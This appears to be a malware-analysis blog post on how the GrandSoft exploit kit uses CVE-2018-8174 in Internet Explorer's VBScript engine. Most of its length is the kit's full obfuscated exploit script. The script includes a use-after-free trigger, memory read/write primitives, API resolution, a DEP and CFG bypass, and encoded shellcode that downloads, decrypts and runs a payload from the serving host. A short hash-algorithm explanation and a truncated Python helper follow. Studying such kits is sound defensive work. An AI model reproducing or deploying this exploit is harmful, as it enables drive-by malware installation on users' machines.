Analyzing Shellcode of GrandSoft's CVE-2018-8174
First
Exploit code for CVE-2018-8174 was published on 2018-05-21.
GrandSoft Exploit Kit previously used CVE-2016-0189; now it uses CVE-2018-8174. The exploit is almost the same as the public PoC, except that some obfuscation has been added. The shellcode, however, is unique. Previously the VBScript (CVE-2016-0189) code generated the cryptographic key and decoded the payload; that work has been moved into the shellcode.
The previous flow was as follows:
Random number generation -> Generate key using the random number ->
Add the key to the end of the URL -> Download encrypted malware ->
Decode with the key
The new flow is as follows:
Random key generation -> Add the key to the end of the URL ->
Download encrypted malware -> Decode with the key
* all performed in shellcode
Traffic
First, let's look at recent GrandSoft traffic. The link to the saz file is given in Kafeine's blog: https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174.html
Opening this saz file shows the following.
The traffic flow is unchanged: it consists of a landing page, the exploit, and the malware. CVE-2018-8174 is used for the exploit, which downloads and executes the malware. The malware payload is encrypted, so the shellcode decrypts it using numerical values taken from the URL.
CVE-2018-8174
For a technical explanation of CVE-2018-8174, please refer to other articles: https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/
The actual code used in GrandSoft is as follows.
Dim r4kWFTbo0 | |
Dim OOOOO0O000 | |
Dim u1QxQecTnfNH1 | |
Dim OOOOO0O0000(40) | |
Dim o3qpIbXXvzd2 | |
Dim OOOOO0O | |
Dim X6siIaXObDC3 | |
Dim OOOOO0O0(6),OOOOO0O00(6) | |
S9nDOpLGtte = "End Function " | |
Dim b3XMsCkw5 | |
Dim OOOOO0O00000,OOOOO0O000000 | |
Dim T3QDCGhIo6 | |
Dim OOOOO0O0000000 | |
Dim l2dVvpwTgOZD7 | |
Dim OOOOO0O00000000,OOOOO0O000000000 | |
Dim V8LOuHnAcRF8 | |
Dim OOOOO0O0000000000,OOOOO0O00000000000 | |
L3GBDCQZNFT = "While Not x7fypqe.C1wRZrhz " | |
Dim O000O,O000OOO | |
Dim y8NSoVzQAaSr10 | |
J5iGkJWBn = "For Each F4vTHd In l2IfOxf While Not B2DMl.d9HfMrAG For Each w1PXwuZ In y0RKKEQt " | |
OOOOO0O0000000=195940000 + 8557 | |
Dim v9UpHkIm12 | |
OOOOO0O00000=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000") | |
Dim X3OruFyGUBq13 | |
OOOOO0O000000=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000") | |
Dim K4eTurgmPOJd14 | |
OOOOO0O000=195800000 + 90093 | |
Dim a9qWUTDvuTrS15 | |
T5pctFCV = "Set m9IIiUhl = New V9NvMKu " | |
Dim U8VHUioXabcA17 | |
Function lIIII(ByVal lIlIl) | |
Dim Z4ZrCVSsLU18 | |
O000OOO0000="" | |
Dim T1UJcTQUz19 | |
For index=0 To Len(lIlIl)-1 | |
Dim T5CCqUuUd20 | |
O000OOO0000=O000OOO0000 &lIlI(Asc(Mid(lIlIl,index+1,1)),2) | |
Dim B0QkRvxfTH21 | |
Next | |
Dim i3zeBlfxLc22 | |
O000OOO0000=O000OOO0000 &"00" | |
Dim b0JmqTWpuJ23 | |
If Len(O000OOO0000)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then | |
Dim X2BSPCpsWD24 | |
O000OOO0000=O000OOO0000 &"00" | |
Dim z0uqreSro25 | |
End If | |
Dim V2VQLeiRXc26 | |
For IIIl=(&h1a1a+3208-&H26a2) To Len(O000OOO0000)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4) | |
e9sciEEDqf = "Set Q9hin = Nothing " | |
lIIIlI=Mid(O000OOO0000,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3)) | |
Dim Q2uMseQQCM28 | |
lIlIll=Mid(O000OOO0000,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504)) | |
N7MmiIIpTx = "Set E7acoa = New G1OTQ Function K3sWQT(F9MeC, H5ATAPn Sub a9MTrCZO " | |
lIIII=lIIII &"%u" &lIlIll &lIIIlI | |
Dim o3DXOOLH30 | |
Next | |
Dim F9QQltbQmsDW31 | |
End Function | |
Dim R2wcSFhyfEEl32 | |
Function lIlI(ByVal Number,ByVal Length) | |
s9HgDbuWD = "If Len(n2lab.z2INAL) > 0 Then For Each l9IlvTTU In N5QgByF " | |
IIII=Hex(Number) | |
e7WKICuQL = "If Len(Q7cENk.I8AIUv) > 0 Then Set d5zIGJLQ = Nothing " | |
If Len(IIII)<Length Then | |
O8IDAWqOeILF = "Sub L4tDKB While Not m9BkQT.L5axfDtw End Sub " | |
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros | |
Dim R2atgdRXVpO36 | |
Else | |
h3mopXfkSm = "Function m4UHTkmT(G9WcQc, s3gdzzl If Len(G4TBLnwf.O3vEm) > 0 Then If Len(Z4PolZIw.I1QvcS) > 0 Then " | |
IIII=Right(IIII,Length) | |
m9NxsPWOv = "Set b7KvI = Nothing " | |
End If | |
Dim S2LvJrTaoUmM39 | |
lIlI=IIII | |
O7VykVQFip = "Set k4spM = New H8hxq Private Sub Class c8zBRvSi Sub f2lSCL " | |
End Function | |
z2JdzgSLyrE = "If Len(a9lWy.o0Twn) > 0 Then f5oafA = L1EwTzlt & Trim(G6XbPbp.g4Xrh()) Set G0TTReMq = New Z7TCZ " | |
Function G0000(lIII) | |
Dim H5IOLSmP42 | |
Dim value | |
Dim y2UOvplgAeex43 | |
OOOOO0O00000000.mem(OOOOO0O0000000+8)=lIII+4 | |
Dim T9JMeWFbX44 | |
OOOOO0O00000000.mem(OOOOO0O0000000)=8 'type string | |
Dim t0SSLSxubCt45 | |
value=OOOOO0O00000000.P0123456789 | |
Dim C6LGgCXIr46 | |
OOOOO0O00000000.mem(OOOOO0O0000000)=2 | |
Dim J1qbCHws47 | |
G0000=value | |
D6UWINuBhAH = "End Sub Private Sub Class y4xBnvP End Sub " | |
End Function | |
s1CIITiCbhc = "Function F6ywsTt(k6xBJ, p2RpOTQn End Function " | |
Function G00001(lIII) | |
c4dDUJlLLqC = "End Function " | |
G00001=G0000(lIII) And (131071-65536) | |
Dim k3rMFITCXPp51 | |
End Function | |
Dim t1LcHCkwJx52 | |
Function G000011(lIII) | |
o9dogsKrLHkC = "Set m3QkPShp = New P6OwpA " | |
G000011=G0000(lIII) And (&h17eb+1312-&H1c0c) | |
Z7FlbxSDcH = "Sub H3GWLP " | |
End Function | |
Dim t3mSOULv55 | |
Sub llllll | |
Dim Z1SnlopJdSL56 | |
End Sub | |
Dim p0IdWEPHXLJ57 | |
Function vsscsc44444 | |
Dim d9pwhdnlX58 | |
OOOOO0O00000000.mem(OOOOO0O0000000)=(&h713+3616-&H1530) | |
L8zkLNTeLx = "Set t3aRG = Nothing " | |
vsscsc44444=OOOOO0O00000000.mem(OOOOO0O0000000+(&h169c+712-&H195c)) | |
J1THdsnL = "Set G4albCG = New y9lgp End Sub " | |
End Function | |
Dim M8sgJJAfnQpH61 | |
Sub ssdsssdsdsdsdsdsdsdsd(ByRef IlIIIl) | |
Dim A2ZMKsfZdd62 | |
OOOOO0O00000000.mem(OOOOO0O0000000+(&h715+3507-&H14c0))=IlIIIl | |
b3oqMrfz = "For Each t7WrUTU In T8LHhr " | |
End Sub | |
Dim W3yMNdyVSv64 | |
Function G0000115 | |
r2XztgkSTEW = "Set u1bxACFy = New v3tEWu End Function " | |
On Error Resume Next | |
Dim S4XqwpilAH66 | |
Dim lllll | |
Dim f8sDqsTSQL67 | |
lllll=llllll | |
Dim E2BqeWcnuc68 | |
lllll=null | |
Dim W7qNHJzrG69 | |
ssdsssdsdsdsdsdsdsdsd lllll | |
Dim d2TIAZnDo70 | |
G0000115=vsscsc44444() | |
Dim n5KUcEFGiSi71 | |
End Function | |
Dim O0IKHtbN72 | |
Function G00001152(IllIll) | |
z7hhKJLp = "Set x3uhBrS = New l5QDsHqU Function T5HFVdI(I6UbI, E5PFBJ " | |
Dim llIl | |
Dim E4gIVxRTp74 | |
llIl=IllIll And &hffff0000 | |
Dim T4qMdKxD75 | |
Do While G0000(llIl+(&h748+4239-&H176f))<>544106784 Or G0000(llIl+(&ha2a+7373-&H268b))<>542330692 | |
J9RgfDLVOV = "Private Sub Class F7QIiOmm While Not P3BKMAzx.n6DEN Private Sub Class U6tvbfTa " | |
llIl=llIl-65536 | |
Dim G9JdsIMouI77 | |
Loop | |
Dim V8uiilDP78 | |
G00001152=llIl | |
L1oxiVHwW = "End Sub " | |
End Function | |
B7stXivWEk = "For Each f8ySXo In v5wKkM If Len(D8qFKpi.y6BTRoQb) > 0 Then Set S1uEaaR = Nothing " | |
Function StrCompWrapper(lIII,llIlIl) | |
Dim P1FgqQgqC81 | |
Dim lIIlI,IIIl | |
Dim s9MEXOQP82 | |
lIIlI="" | |
Dim w9GofFRihKNW83 | |
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835) | |
Dim Q5hbvtsT84 | |
lIIlI=lIIlI &Chr(G000011(lIII+IIIl)) | |
Dim l8BfqpCByv85 | |
Next | |
Dim I9CtgtQThN86 | |
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl)) | |
z6XPmMwOfI = "Set g2efvH = Nothing Private Sub Class J4qpf While Not w0pRBFsO.n5BKft " | |
End Function | |
Dim g5yPikcqhF88 | |
Function GetBaseFromImport(base_address,name_input) | |
Dim z4ztTTFnLt89 | |
Dim import_rva,nt_header,descriptor,import_dir | |
Dim e8uAELMXgrIg90 | |
Dim IIIIII | |
I0GNqfUHq = "End Sub While Not r9TTQ.R6KPot u4Vvqd = t9TSNfB & Trim(H2iGBiK.v1Lzp()) " | |
nt_header=G0000(base_address+(&h3c)) | |
Dim d3XiqbLtuk92 | |
import_rva=G0000(base_address+nt_header+&h80) | |
d5UfvJZTvkDA = "Set U8LIr = New l6VRpf For Each c1hIW In G6yuVb " | |
import_dir=base_address+import_rva | |
Dim w9NPmTRb94 | |
descriptor=0 | |
x8wgQaGh = "For Each T8IgL In n1fBIH " | |
Do While True | |
Dim W6WBdUzDbvwE96 | |
Dim Name | |
Dim x0uyChlT97 | |
Name=G0000(import_dir+descriptor*(&h14)+&hc) | |
Dim Z6XsdyIhla98 | |
If Name=0 Then | |
X7XUaLvr = "Private Sub Class N9kQCuO While Not K3KHCgNF.k6HucRFr Sub S8Xfxd " | |
GetBaseFromImport=&hBAAD0000 | |
Dim N5AiIGoghWf100 | |
Exit Function | |
Dim O2rPRNMVmG101 | |
Else | |
Dim B8cTChhq102 | |
If StrCompWrapper(base_address+Name,name_input)=0 Then | |
Dim J0ogIoHT103 | |
Exit Do | |
Dim D2Abemgyux104 | |
End If | |
Dim E2fSTQld105 | |
End If | |
Dim S7SiTdunRdMM106 | |
descriptor=descriptor+1 | |
Dim O4PSMlcs107 | |
Loop | |
F3mtkFNE = "End Function Set d8WqBE = New i6RFgKc Function m5ZmoTEf(I4LuxIdK, h9Edgqv " | |
IIIIII=G0000(import_dir+descriptor*(&h14)+&h10) | |
J8OHAemJhKA = "Set h3NHcAT = New U5kGz o5ESlP = n6ZoHw & Trim(I9VEFef.R9dOAbg()) " | |
GetBaseFromImport=G00001152(G0000(base_address+IIIIII)) | |
Dim L1XvWADVVMB110 | |
End Function | |
Dim y3zlrXnJS111 | |
Dim E6NVTggrAK112 | |
Function gddgddddddddd(G0000115222,name) | |
Dim w1vWZCiDEM113 | |
Dim p,G00001152223,index | |
Dim A1RaffVHAFV114 | |
Dim G000011522,function_names,function_ordin | |
Dim Q4MvmDCrqg115 | |
Dim Illlll | |
Dim D9PygrcSmhHo116 | |
p=G0000(G0000115222+&h3c) | |
n9Liwczo = "Sub J0QRG If Len(A7VzCkM.V6WsyFTt) > 0 Then " | |
p=G0000(G0000115222+p+&h78) | |
Dim Z7sryoHBsJ118 | |
G00001152223=G0000115222+p | |
E1rrArlu = "Set T2IkGsT = New G2hIVZ u6kVMog = t2KlTP & Trim(L9neteV.y5MGkJ()) " | |
Dim H7TRQNkIun120 | |
G000011522=G0000115222+G0000(G00001152223+&h1c) | |
Dim I6eExGoU121 | |
function_names=G0000115222+G0000(G00001152223+&h20) | |
Dim L6kLMxwC122 | |
function_ordin=G0000115222+G0000(G00001152223+&h24) | |
Dim Z2TaZfXCpJx123 | |
index=0 | |
Dim Q1vbnCTrD124 | |
Do While True | |
o4yryAoATUBs = "Set d3kHEdt = New s7EUrHp " | |
Dim lllI | |
Dim q8qsfopzJdk126 | |
lllI=G0000(function_names+index*4) | |
Dim Z0gPhSglVVKw127 | |
If StrCompWrapper(G0000115222+lllI,name)=0 Then | |
Dim A0XQZwzJTXl128 | |
Exit Do | |
Dim U2ZtOITTXH129 | |
End If | |
Dim Z2iuSSLwLN130 | |
index=index+1 | |
Dim R9ipqBakoCCT131 | |
Loop | |
u6fPloJJL = "Set O5vMVf = Nothing Set o6wTWUTq = New f1JsV l6aBcl = B8KItmy & Trim(Z2stAkdE.K5EiUeFZ()) " | |
Illlll=G00001(function_ordin+index*2) | |
t4JOAPxWao = "Private Sub Class g4FdoGo " | |
p=G0000(G000011522+Illlll*4) | |
R8LXAlutqC = " L4CCBJN = z8yaTQ & Trim(k5OsgDXz.w8buNcnK()) Sub X3UcNLRp End Sub " | |
gddgddddddddd=G0000115222+p | |
Dim f5wuapzZB135 | |
End Function | |
Dim P5OMufJnkb136 | |
Dim g9xsrGBR0 | |
Dim L5VvPmXuCHo1 | |
Function aaaAA33444333555(ByVal value) | |
Dim H9hmIkcDI2 | |
Dim High,Low | |
Dim o3GrVTUD3 | |
High=lIlI((value And &hffff0000)/&h10000,4) | |
Dim z2VyTmBR4 | |
Low=lIlI(value And &hffff,4) | |
Dim P9XStNoPA5 | |
aaaAA33444333555=Unescape("%u" &Low &"%u" &High) | |
Dim B1aZedSCP6 | |
End Function | |
Dim d2fnrwOlIol7 | |
Function lIllIl | |
Dim K6gXLTdiXw8 | |
Dim IIIl,G000011522232,G00001152223246,G0000115222324,aaaAA33444333,aaaAA33,aaaAA33444 | |
Dim p6QoNVGTH9 | |
G000011522232=lIlI(O000O,8) | |
W8xGiLZQgm = "While Not u1OONAE.I3bqF For Each H3vAFqxz In Q9wNFPGL For Each T4gktCu In H4qeP " | |
G0000115222324=Mid(G000011522232,1,2) | |
Dim M0SXXrUzUJcr11 | |
aaaAA33444333=Mid(G000011522232,3,2) | |
Dim g7ZssRnIIR12 | |
aaaAA33=Mid(G000011522232,5,2) | |
Dim Z1pDPKoE13 | |
aaaAA33444=Mid(G000011522232,7,2) | |
Dim B4Clfwhmppb14 | |
G00001152223246="" | |
F9MDopUDeLh = "For Each v9kLVdPp In E8Bscw Private Sub Class W7HqB Set x4lZenvX = Nothing " | |
G00001152223246=G00001152223246 &"%u0000%u" &aaaAA33444 &"00" | |
Dim h3NmfOTlHkqC16 | |
For IIIl=1 To 3 | |
Dim Q0dNAFMpBX17 | |
G00001152223246=G00001152223246 &"%u" &aaaAA33444333 &aaaAA33 | |
L6QTQhTyZrQc = "Sub W6zytNI End Sub While Not z2yzkCNL.S4Mkb " | |
G00001152223246=G00001152223246 &"%u" &aaaAA33444 &G0000115222324 | |
Dim x6eucfEfWQU19 | |
Next | |
Dim h6RNTOURIQX20 | |
G00001152223246=G00001152223246 &"%u" &aaaAA33444333 &aaaAA33 | |
Dim R4cryWNyx21 | |
G00001152223246=G00001152223246 &"%u00" &G0000115222324 | |
M0KNhJRT = "End Sub " | |
lIllIl=Unescape(G00001152223246) | |
Dim X8zgTTLkMd23 | |
End Function | |
Dim G3fTNmSMKU24 | |
Function jjjjj333333(ShellcodeAddrParam) 'bypass cfg | |
Dim c7KtVzyvFcT25 | |
Dim G00001152223246 | |
Dim p8xDxemX26 | |
G00001152223246=String((100334-65536),Unescape("%u4141")) | |
Dim x3sMCAqdr27 | |
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam) | |
Dim c4RLWlbqTRqe28 | |
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam) | |
Dim P4ZPKcRItFXG29 | |
G00001152223246=G00001152223246 &aaaAA33444333555(&h3000) | |
Dim b9RppUdna30 | |
G00001152223246=G00001152223246 &aaaAA33444333555(&h40) | |
Dim y7NHmxEO31 | |
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam-8) | |
Dim p1rPTbQAzzNu32 | |
G00001152223246=G00001152223246 &String(6,Unescape("%u4242")) | |
q5mhWpHSO = "Function f5WdLxFT(W1IzXrlr, h4DwhVc Private Sub Class d9qfwI Set R6OMgp = New z2HbLTe " | |
G00001152223246=G00001152223246 &lIllIl() | |
Dim o7nipSBlTptJ34 | |
G00001152223246=G00001152223246 &String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141")) | |
R7HslHPu = "Sub h2fHJ " | |
jjjjj333333=G00001152223246 | |
Dim T1rCzxbaBmS36 | |
End Function | |
Dim X7PXMUADl37 | |
Function eeee6666(mmm22222) | |
Dim d1tFcNgPT38 | |
Dim G00001152223246 | |
Dim T1nliuABi39 | |
Dim lllllI | |
Dim C8GxXneW40 | |
lllllI=mmm22222+&h23 | |
T9NEwrqhcN = "End Function " | |
G00001152223246="" | |
Dim D6DVtLOSbWeA42 | |
G00001152223246=G00001152223246 &aaaAA33444333555(lllllI) | |
Dim F7DDoWkmetNA43 | |
G00001152223246=G00001152223246 &String((&hb8-LenB(G00001152223246))/2,Unescape("%4141")) | |
Dim O1TvStXN44 | |
G00001152223246=G00001152223246 &aaaAA33444333555(O000OOO) | |
Dim x2QKxZPgWSrm45 | |
G00001152223246=G00001152223246 &aaaAA33444333555(&h1b) | |
Dim g3TSGwNNTvl46 | |
G00001152223246=G00001152223246 &aaaAA33444333555(0) | |
I5cwEhOROJZp = "End Sub " | |
G00001152223246=G00001152223246 &aaaAA33444333555(mmm22222) | |
Dim G8gTBuqohTA48 | |
G00001152223246=G00001152223246 &aaaAA33444333555(&h23) | |
Dim I2TEHrVNkSn49 | |
G00001152223246=G00001152223246 &String((&400-LenB(G00001152223246))/2,Unescape("%u4343")) | |
Dim C5LKfeoz50 | |
eeee6666=G00001152223246 | |
Dim Q1kBLgWai51 | |
End Function | |
Dim w9hKsTiITQT52 | |
Sub ExecuteShellcode | |
Dim a5vsITVrr53 | |
OOOOO0O00000000.mem(OOOOO0O0000000)=&h4d 'DEP bypass | |
W9yiSsZEFH = "End Sub End Sub End Sub " | |
OOOOO0O00000000.mem(OOOOO0O0000000+8)=0 | |
V3hTApwpF = "Set G9fhXW = New A4rXxqo Set u8rTTyc = New o4VFg Private Sub Class e9TXunV " | |
msgbox(OOOOO0O0000000) 'VT replaced | |
e9vSIHqy = "For Each w2dcN In m3UmafoO Function E1guW(s8Tdm, Q5ygfTXZ Function D7bxCbg(L2AXuRG, i0ZfGm " | |
End Sub | |
Dim K3dzbfOBuzgb57 | |
Dim q9hgUHqmUShe58 | |
Class cla1 | |
Private Sub Class_Terminate() | |
Set OOOOO0O0(OOOOO0O000)=OOOOO0O((&h1078+5473-&H25d8)) | |
OOOOO0O000=OOOOO0O000+(&h14b5+2725-&H1f59) | |
OOOOO0O((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d) | |
End Sub | |
End Class | |
Class cla2 | |
Private Sub Class_Terminate() | |
Set OOOOO0O00(OOOOO0O000)=OOOOO0O((&h15b+3616-&Hf7a)) | |
OOOOO0O000=OOOOO0O000+(&h880+542-&Ha9d) | |
OOOOO0O((&h1f75+342-&H20ca))=(&had3+3461-&H1857) | |
End Sub | |
End Class | |
Class IIIlIl | |
End Class | |
Class llIIl | |
Dim mem | |
Function P | |
End Function | |
Function SetProp(Value) | |
mem=Value | |
SetProp=0 | |
End Function | |
End Class | |
Class IIIlll | |
Dim mem | |
Function P0123456789 | |
P0123456789=LenB(mem(OOOOO0O0000000+8)) | |
End Function | |
Function SPP | |
End Function | |
End Class | |
Class lllIIl | |
Public Default Property Get P | |
Dim llII | |
P=174088534690791e-324 | |
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c) | |
OOOOO0O0(IIIl)=(&h2176+711-&H243d) | |
Next | |
Set llII=New IIIlll | |
llII.mem=OOOOO0O00000 | |
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c) | |
Set OOOOO0O0(IIIl)=llII | |
Next | |
End Property | |
End Class | |
Class llllII | |
Public Default Property Get P | |
Dim llII | |
P=636598737289582e-328 | |
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84) | |
OOOOO0O00(IIIl)=(&h442+2598-&He68) | |
Next | |
Set llII=New IIIlll | |
llII.mem=OOOOO0O000000 | |
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b) | |
Set OOOOO0O00(IIIl)=llII | |
Next | |
End Property | |
End Class | |
Set OOOOO0O0000000000=New lllIIl | |
Set OOOOO0O00000000000=New llllII | |
Sub UAF | |
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233) | |
Set OOOOO0O0000(IIIl)=New IIIlIl | |
Next | |
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed) | |
Set OOOOO0O0000(IIIl)=New llIIl | |
Next | |
OOOOO0O000=0 | |
For IIIl=0 To 6 | |
ReDim OOOOO0O(1) | |
Set OOOOO0O(1)=New cla1 | |
Erase OOOOO0O | |
Next | |
Set OOOOO0O00000000=New llIIl | |
OOOOO0O000=0 | |
For IIIl=0 To 6 | |
ReDim OOOOO0O(1) | |
Set OOOOO0O(1)=New cla2 | |
Erase OOOOO0O | |
Next | |
Set OOOOO0O000000000=New llIIl | |
End Sub | |
Sub InitObjects | |
OOOOO0O00000000.SetProp(OOOOO0O0000000000) | |
OOOOO0O000000000.SetProp(OOOOO0O00000000000) | |
OOOOO0O0000000=OOOOO0O000000000.mem | |
End Sub | |
Sub sssfsfsfsfsfs222 | |
UAF | |
InitObjects | |
vb_adrr=G0000115() | |
vbvvvvvvvv=G00001152(G0000(vb_adrr)) | |
mbmmmmmmm=GetBaseFromImport(vbvvvvvvvv,"msvcrt.dll") | |
mbmbmdddcdd=GetBaseFromImport(mbmmmmmmm,"kernelbase.dll") | |
ntffdddddfss=GetBaseFromImport(mbmmmmmmm,"ntdll.dll") | |
O000OOO=gddgddddddddd(mbmbmdddcdd,"VirtualProtect") | |
O000O=gddgddddddddd(ntffdddddfss,"NtContinue") | |
ssdsssdsdsdsdsdsdsdsd c111111() | |
c2222222=vsscsc44444()+8 | |
ssdsssdsdsdsdsdsdsdsd jjjjj333333(c2222222) | |
mmm22222=vsscsc44444()+69596 | |
ssdsssdsdsdsdsdsdsdsd eeee6666(mmm22222) | |
mnmm4333333=vsscsc44444() | |
ExecuteShellcode | |
End Sub | |
Function c111111() | |
locationUrl = "http://" & window.location.hostname & "/7" | |
strString = locationUrl | |
linkHex ="" | |
For i=1 To Len(strString) | |
linkHex = linkHex + Hex(Asc(Mid(strString,i,1))) | |
Next | |
stringSC = "" | |
stringSC = linkHex + "" | |
g = Round(Len(stringSC)/4) | |
if g <> (Len(stringSC)/4) Then stringSC = stringSC + "00" | |
outStr = "" | |
For i = 1 to Len(stringSC) Step 4 | |
outStr = outStr + "%u" + Mid(stringSC,i+2,2) + Mid(stringSC,i,2) | |
Next | |
U109 = "%u" | |
U88 = "%uE8" | |
UF1 = "%uF" | |
outStr = outStr + "%u0000" | |
G00001152223246=Unescape(""& U109 &"0000"& U109 &"0000"& U109 &"0000"& U109 &"0000") &Unescape(""& U109 &"9CE9"& U109 &"0002"& U109 &"3100"& U109 &"64C9"& U109 &"718B"& U109 &"8B30"& U109 &"0C76"& U109 &"768B"& U109 &"8B1C"& U109 &"086E"& U109 &"468B"& U109 &"8B20"& U109 &"6636"& U109 &"4839"& U109 &"7518"& U109 &"8BF2"& U109 &"3C45"& U109 &"548B"& U109 &"7805"& U109 &"EA01"& U109 &"728B"& U109 &"0120"& U109 &"52EE"& U109 &"C931"& U109 &"4149"& U109 &"01AD"& U109 &"31E8"& U109 &"0FDB"& U109 &"10BE"& U109 &"F238"& U109 &"0874"& U109 &"CBC1"& U109 &"010E%u40D3"& UF1 &"1EB%u1F3B%uE775%u8B5A%u2472%uEE01%u8B66%u4E0C%u728B%u011C%u8BEE%u8E04"& U88 &"01%uC3AB"& U88 &"5F"& UF1 &"F9F"& UF1 &"FFF%uB4E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FAF"& UF1 &"FFF%uAAE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FA5"& UF1 &"FFF%uA0E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F9B"& UF1 &"FFF%u96E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F91"& UF1 &"FFF%u3368%u0032%u6800%u7375%u7265"& UF1 &"F54"& UF1 &"C57%uC589%u7CE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F77"& UF1 &"FFF%u6E68%u7465%u6800%u6977%u696E"& UF1 &"F54"& UF1 &"457%uC589%u62E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F5D"& UF1 &"FFF%u58E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F53"& UF1 &"FFF%u4EE8"& UF1 &"FFF%u6AFF%u6840%u1000%u0000%u0068%u07D0%u6A00"& UF1 &"F00%uC457%u0789%uC689%u57FF%u89CC%u8106%u00C6%u0010%u5600%u0068%u0008"& UF1 &"F00%uC857%u078B"& UF1 &"B89%uC383%u8904%u83F9%u6DE9%uC689%uC683"& UF1 &"F08%u5330%u5651%u57FF%u8BE8%u8907%u81C3%u00C3%u0010%u8900%u83F9%u67E9%u30FF%u5153"& UF1 &"F53%uE457%u378B%uC683%u6A08%u6A00%u6A00%u6A00%u5600%u57FF%u89EC%uEC47%u006A%u006A%u006A%u006A"& UF1 &"F56%uEC77%u57FF%u89F0"& UF1 &"047%u078B%u0005%u0010%u6A00%u6A00%u6A50%u6A02%u6A00%u6802%u0000%u4000"& UF1 &"F50%uD457%u4789%u8BD4%u8137%u08C6%u0023%uC700"& UF1 &"846%u0001%u0000%u078B%u188B%u7E83%u00F8%u4074"& UF1 &"089"& U88 &"83%u5008%u0068%u0004%u5600%u77FF"& UF1 &"FF0"& UF1 &"857%u7E83%u00F8%u2874%u4E8B%u89F8%u48F0%u8140%uAAC3%u0000%u8000%u48F3%u1830"& UF1 &"2E2"& UF1 &"089"& U88 
&"83%u6A04%u5000%u76FF%u56F8%u77FF"& UF1 &"FD4%uD857%uBAEB%u77FF"& UF1 &"FD4%uDC57%u77FF"& UF1 &"FF0"& UF1 &"C57%u77FF"& UF1 &"FEC"& UF1 &"C57"& UF1 &"B89%uEB83%u8B4D%u0507%u1000%u0000"& UF1 &"989%uE983%u8B7B%u812F%u00C5%u0030%u5000%u5153"& UF1 &"F55%uE457%u6C68%u3233%u6800%u6873%u6C65"& UF1 &"F54%uE057%u9090%u9090%u8990%u83C5%u04EF%u07C7%u065A%u4C98%u04E8"& UF1 &"FFE%u8BFF%u8137%u00C6%u0010%u8B00%u0507%u3000%u0000"& UF1 &"B89%uEB83%u8955%u81FE%u83EE%u0000%u8900%u81F9%u8FE9%u0000%u6A00%u6A01%u5000%u5156%u006A%u57FF%u83FC%u05F8%uD374%u006A"& UF1 &"E6A%u57FF%u72C0%u7500%u6E00%u6100%u7300%u0000%u6300%u6D00%u6400%u0000%u2500%u7300%u2200%u2500%u7300%u2200%u0000%u2500%u2F73%u6425%u2500%u7300%u2500%u6400%u2E00%u6500%u7800%u6500%u0000%u6300%u6D00%u6400%u2000%u2F00%u4300%u2000%u0000"& U88 &"00"& UF1 &"DBA"& UF1 &"FFF%u6FD0%u26FD%u6F8A%u13C6%u3B42%u208B%u8E70%u1022%uB1AD%u4F89%u8EF8"& UF1 &"470"& UF1 &"C13%u638D%uB973%u01D5%u1DF9%uA97F%u70B5%uA596%u709F%uA596%uC2C2%uBE70%uA391%uB75F%uAE00%uBCB9%uE926%u639E%uD37E%u88A8%u0000%u0000" & outStr ) | |
G00001152223246=G00001152223246 & String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141")) | |
c111111=G00001152223246 | |
End Function | |
sssfsfsfsfsfs222 |
Shellcode
The shellcode resolves API functions by hash, but the hash differs from the well-known one.
The shellcode's hash algorithm is ror14AddHash32.
Pseudocode is as follows:
acc := 0;
for c in input_string {
    acc := ROR(acc, 14);   // 32-bit rotate right by 14
    acc := acc + c;        // add the next character, truncated to 32 bits
}
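A Python implementation of ror14AddHash32, added here as an analyst aid; it is not code from the shellcode or the original post. The function names, the rotation parameter and the name list are my own, and the list simply reuses the DLL and API names that the VBScript stage above resolves. Because the page notes the hash differs from the well-known one, the rotation is a parameter so the widely used ROR-13 variant can be computed for comparison.

```python
"""ror14AddHash32 resolver (added example, not the shellcode's own code)."""
from typing import Dict, Iterable, Optional

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits` (0..31)."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror_add_hash32(name: str, rotation: int) -> int:
    """Generic ROR-n additive hash over the ASCII bytes of `name`.

    Follows the page's pseudocode: rotate the accumulator, then add the
    character.  Whether the real shellcode upper-cases names or includes
    a terminating NUL is not stated on the page; this assumes neither.
    """
    acc = 0
    for c in name.encode("ascii"):
        acc = (ror32(acc, rotation) + c) & MASK32
    return acc


def ror14_add_hash32(name: str) -> int:
    """The GrandSoft variant: rotation of 14."""
    return ror_add_hash32(name, 14)


# Names the VBScript stage resolves; used here as the seed for a lookup table.
KNOWN_NAMES = ["VirtualProtect", "NtContinue",
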